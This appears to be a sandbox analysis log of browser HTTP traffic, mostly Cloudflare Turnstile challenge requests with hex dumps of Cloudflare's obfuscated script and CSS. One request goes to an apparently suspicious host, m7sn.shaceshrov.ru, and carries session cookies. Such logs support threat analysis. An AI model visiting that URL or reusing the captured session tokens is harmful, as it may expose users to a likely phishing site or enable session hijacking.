                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.1649736104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:22 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901886f16aa00f3b&lang=auto HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:22 UTC331INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:22 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 116670
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886f55afcf797-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:22 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65
                                                                  Data Ascii: ","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","turnstile_feedback_report":"Having%20trouble%3F","not_embedded":"This%20challenge%20must%20be%20embedde
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 2c 66 57 2c 67 6d 2c 67 74 2c 67 78 2c 67 79 2c 67 43 2c 67 44 2c 67 48 2c 66 54 2c 66 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 37 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 37 34 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 38 39 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 30 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 37 38 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 37 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 38 39 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49
                                                                  Data Ascii: ,fW,gm,gt,gx,gy,gC,gD,gH,fT,fU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1397))/1*(-parseInt(gI(774))/2)+parseInt(gI(1689))/3*(-parseInt(gI(980))/4)+-parseInt(gI(978))/5+-parseInt(gI(987))/6*(parseInt(gI(889))/7)+parseInt(gI
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 20 45 72 72 6f 72 3f 67 5b 67 4d 28 31 31 39 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 38 38 38 29 5d 28 67 5b 67 4d 28 31 31 39 31 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 31 30 33 33 29 5d 28 67 5b 67 4d 28 31 31 39 31 29 5d 29 29 3a 67 5b 67 4d 28 31 31 39 31 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 38 38 38 29 5d 28 67 5b 67 4d 28 31 31 39 31 29 5d 29 2c 6d 3d 6b 5b 67 4d 28 31 32 35 30 29 5d 28 69 2c 67 4d 28 31 37 30 33 29 29 2c 6e 3d 65 4d 5b 67 4d 28 31 36 31 32 29 5d 5b 67 4d 28 31 35 39 30 29 5d 3f 6b 5b 67 4d 28 37 31 34 29 5d 28 27 68 2f 27 2b 65 4d 5b 67 4d 28 31 36 31 32 29 5d 5b 67 4d 28 31 35 39 30 29 5d 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 67 4d 28 33 31 39 29 5d 28 6b 5b 67 4d 28 36 33 36 29 5d 28 6b 5b 67 4d 28 36 33 36 29 5d 28 6b 5b 67 4d 28 31 34
                                                                  Data Ascii: Error?g[gM(1191)]=JSON[gM(888)](g[gM(1191)],Object[gM(1033)](g[gM(1191)])):g[gM(1191)]=JSON[gM(888)](g[gM(1191)]),m=k[gM(1250)](i,gM(1703)),n=eM[gM(1612)][gM(1590)]?k[gM(714)]('h/'+eM[gM(1612)][gM(1590)],'/'):'',o=k[gM(319)](k[gM(636)](k[gM(636)](k[gM(14
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 28 78 3d 42 2e 68 5b 43 2e 67 5e 33 38 5d 2c 42 3d 67 5b 67 4e 28 31 33 38 32 29 5d 28 78 5b 33 5d 2c 44 2e 6a 29 2c 78 5b 33 5d 3d 67 5b 67 4e 28 31 33 38 32 29 5d 28 67 5b 67 4e 28 37 34 37 29 5d 28 42 2a 42 2a 31 37 38 36 2c 67 5b 67 4e 28 38 32 33 29 5d 28 33 34 36 30 39 2c 42 29 29 2c 34 30 34 36 36 29 26 32 35 35 2c 45 2e 68 5b 46 2e 6a 5e 47 2e 67 5d 29 3b 74 72 79 7b 78 5b 67 4e 28 31 34 30 35 29 5d 28 52 29 28 53 2e 6a 29 7d 63 61 74 63 68 28 45 29 7b 69 66 28 78 3d 61 31 2e 68 5b 61 32 2e 67 5e 31 33 36 5d 2c 30 3c 78 5b 67 4e 28 38 37 33 29 5d 29 7b 66 6f 72 28 43 3d 67 5b 67 4e 28 31 35 36 38 29 5d 5b 67 4e 28 38 35 35 29 5d 28 27 7c 27 29 2c 44 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 43 5b 44 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a
                                                                  Data Ascii: (x=B.h[C.g^38],B=g[gN(1382)](x[3],D.j),x[3]=g[gN(1382)](g[gN(747)](B*B*1786,g[gN(823)](34609,B)),40466)&255,E.h[F.j^G.g]);try{x[gN(1405)](R)(S.j)}catch(E){if(x=a1.h[a2.g^136],0<x[gN(873)]){for(C=g[gN(1568)][gN(855)]('|'),D=0;!![];){switch(C[D++]){case'0':
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 50 28 31 31 39 31 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 67 50 28 31 34 34 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 52 29 7b 67 52 3d 67 50 2c 67 52 28 36 36 32 29 21 3d 3d 67 52 28 31 32 37 30 29 3f 65 4d 5b 67 52 28 34 34 38 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 69 5b 67 52 28 31 32 36 39 29 5d 29 3a 66 3d 67 5b 67 52 28 31 36 30 38 29 5d 28 67 52 28 36 38 37 29 2c 68 5b 67 52 28 31 36 31 32 29 5d 5b 67 52 28 36 38 36 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 31 34 34 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 29 7b 67 53 3d 67 50 2c 65 4d 5b 67 53 28 31 31 37 33 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 50 28 36 39 30 29 5d 5b 67 50 28 34 37 33 29 5d 28 67 50 28 36 36 35 29 2c 64 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65
                                                                  Data Ascii: P(1191)]=h,m=l,eM[gP(1440)](function(gR){gR=gP,gR(662)!==gR(1270)?eM[gR(448)](m,undefined,i[gR(1269)]):f=g[gR(1608)](gR(687),h[gR(1612)][gR(686)])},10),eM[gP(1440)](function(gS){gS=gP,eM[gS(1173)]()},1e3),eM[gP(690)][gP(473)](gP(665),d));return![]},eQ=0,e
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 69 69 28 35 32 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 69 28 31 35 35 37 29 2c 27 77 69 64 67 65 74 49 64 27 3a 78 5b 69 69 28 31 36 31 32 29 5d 5b 69 69 28 31 36 33 38 29 5d 2c 27 65 76 65 6e 74 27 3a 63 5b 69 69 28 31 35 34 35 29 5d 2c 27 6d 6f 64 65 27 3a 42 5b 69 69 28 31 36 31 32 29 5d 5b 69 69 28 38 37 34 29 5d 2c 27 6e 65 78 74 52 63 56 27 3a 43 5b 69 69 28 31 36 31 32 29 5d 5b 69 69 28 35 38 33 29 5d 7d 2c 27 2a 27 29 2c 44 5b 63 5b 69 69 28 31 34 39 37 29 5d 5d 5b 69 69 28 35 32 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 63 5b 69 69 28 31 36 32 36 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 45 5b 69 69 28 31 36 31 32 29 5d 5b 69 69 28 31 36 33 38 29 5d 2c 27 65 76 65 6e 74 27 3a 63 5b 69 69 28 36 32 39 29 5d 7d 2c 27 2a 27 29 29 3a 63 5b 69 69
                                                                  Data Ascii: ii(525)]({'source':ii(1557),'widgetId':x[ii(1612)][ii(1638)],'event':c[ii(1545)],'mode':B[ii(1612)][ii(874)],'nextRcV':C[ii(1612)][ii(583)]},'*'),D[c[ii(1497)]][ii(525)]({'source':c[ii(1626)],'widgetId':E[ii(1612)][ii(1638)],'event':c[ii(629)]},'*')):c[ii
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 53 6e 63 76 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 69 46 77 78 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 50 42 52 4b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 50 79 52 4c 66 27 3a 69 51 28 31 34 36 34 29 2c 27 54 74 6f 43 57 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 55 79 6f 48 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 7a 67 56 56 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 46 75 42 49 6b
                                                                  Data Ascii: ction(h,i){return i|h},'Sncvs':function(h,i){return h<<i},'iFwxR':function(h,i){return i==h},'PBRKp':function(h,i){return h(i)},'PyRLf':iQ(1464),'TtoCW':function(h,i){return h==i},'UyoHS':function(h,i){return h|i},'zgVVi':function(h,i){return h<<i},'FuBIk
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 32 27 3a 69 66 28 4f 62 6a 65 63 74 5b 69 53 28 39 35 36 29 5d 5b 69 53 28 33 38 37 29 5d 5b 69 53 28 31 30 35 30 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 69 53 28 31 31 33 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 69 53 28 31 31 38 32 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 69 53 28 31 65 33 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 69 53 28 38 30 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 53 28 31 31 33 38 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 69 53 28 34 36 33 29 5d 28 38 2c 73 29 3b 48 3d 4f 26 31 7c 48 3c 3c 31 2e 31 36 2c 49 3d 3d 64 5b 69 53 28 37 33 35 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 53 28 38 30 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29
                                                                  Data Ascii: 2':if(Object[iS(956)][iS(387)][iS(1050)](B,C)){if(256>C[iS(1138)](0)){for(s=0;d[iS(1182)](s,F);H<<=1,d[iS(1e3)](I,j-1)?(I=0,G[iS(802)](o(H)),H=0):I++,s++);for(O=C[iS(1138)](0),s=0;d[iS(463)](8,s);H=O&1|H<<1.16,I==d[iS(735)](j,1)?(I=0,G[iS(802)](o(H)),H=0)
                                                                  2025-01-13 21:37:22 UTC1369INData Raw: 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 64 5b 69 53 28 31 31 38 32 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 69 53 28 31 34 36 39 29 5d 28 48 3c 3c 31 2e 30 34 2c 4f 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 53 28 38 30 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 53 28 31 31 33 38 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 69 53 28 34 36 33 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 69 53 28 31 31 35 32 29 5d 28 48 2c 31 29 7c 31 26 4f 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 69 53 28 38 30 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 69
                                                                  Data Ascii: o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;d[iS(1182)](s,F);H=d[iS(1469)](H<<1.04,O),j-1==I?(I=0,G[iS(802)](o(H)),H=0):I++,O=0,s++);for(O=C[iS(1138)](0),s=0;d[iS(463)](16,s);H=d[iS(1152)](H,1)|1&O,I==j-1?(I=0,G[iS(802)](o(H)),H=0):I++,O>>=1,s++);}D--,d[i


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.1649737104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:22 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:22 UTC240INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:22 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  cache-control: max-age=2629800, public
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886f5cf0d1885-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:22 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.1649726172.67.204.744437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:23 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                                  Host: m7sn.shaceshrov.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://m7sn.shaceshrov.ru/IgEEv/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Inc1V1dMc1ZQRWxxdjRBcUI2WnJOL2c9PSIsInZhbHVlIjoiTTJ2TEZpQjdYaE1CUVJSNFNEY2tyYWh2eVRzTjlWeW83eTJZMzNJUmY3Q0VVL1FqOFNuaFAyMWsyM3FMc044bjJMV3VFZ3FJaU04K2toVnJDLzEyNnFpK2pWbzRtUFh5V3BSWjZ4N21DTSt6dmQ2UHZkUVhjUXZzdmZLTmhDV3EiLCJtYWMiOiJiMzAyOWExNzBkZDIwNmI4MWZlN2JjOGFjNWNlODlkYWQ0ZTdjMzJiZGU5N2MxYThhMTExMTRkYmIwZWMxNThkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilo2OVIvTXNSSHRqMDlLQ3FVdlRPMnc9PSIsInZhbHVlIjoiU3B6TldKbXVFODJRV2xjS3Y4V2xBNWhCSy9CaDg5ellaYkpTSTYxdnNDQ2dxOTlDdkFjWjBGaC9mQWdGMEMwYUYyYkZndHpNQm4xZGU3QzEvS1ZXRU42Ri9KZzhLc0RuUVRabFFUbWdxdVcvcnFmbFFVUDI4TzNzRmZBRDVkLy8iLCJtYWMiOiIxOTNmZGQyNzFmODNlNzE4NTIzMzAwY2UwYzJkZTE5NDBhMDNhODRiNDc4Zjc4ZTM3M2Y3ZTQ3ZjI2Y2U2ZTZiIiwidGFnIjoiIn0%3D
                                                                  2025-01-13 21:37:23 UTC1070INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:37:23 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  Age: 3537
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h26TBLVTtzPIJ9qwskmM05jz%2FRcml4h%2BqRQm9ndjxZo%2Bp9rqLiqn26xPkTWlfuMGQDwRW7aTQ5r1ZmIN9tweYD1CYz5xHFGpdQian4USZriP3YfCWz7lwKiNWlGylg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=74770&min_rtt=74755&rtt_var=28044&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2261&delivery_rate=38097&cwnd=241&unsent_bytes=0&cid=6b468b66a6c361ea&ts=106&x=0"
                                                                  CF-Cache-Status: HIT
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886f7e93b9e17-EWR
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2027&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1899&delivery_rate=1425085&cwnd=186&unsent_bytes=0&cid=3674b9ad7e4a0e24&ts=3981&x=0"
                                                                  2025-01-13 21:37:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.1649738104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:23 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:23 UTC240INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:23 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  cache-control: max-age=2629800, public
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886f9cc8e8c39-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.1649739104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:23 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901886f16aa00f3b&lang=auto HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:23 UTC331INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:23 GMT
                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                  Content-Length: 119335
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886faef6e8cb7-EWR
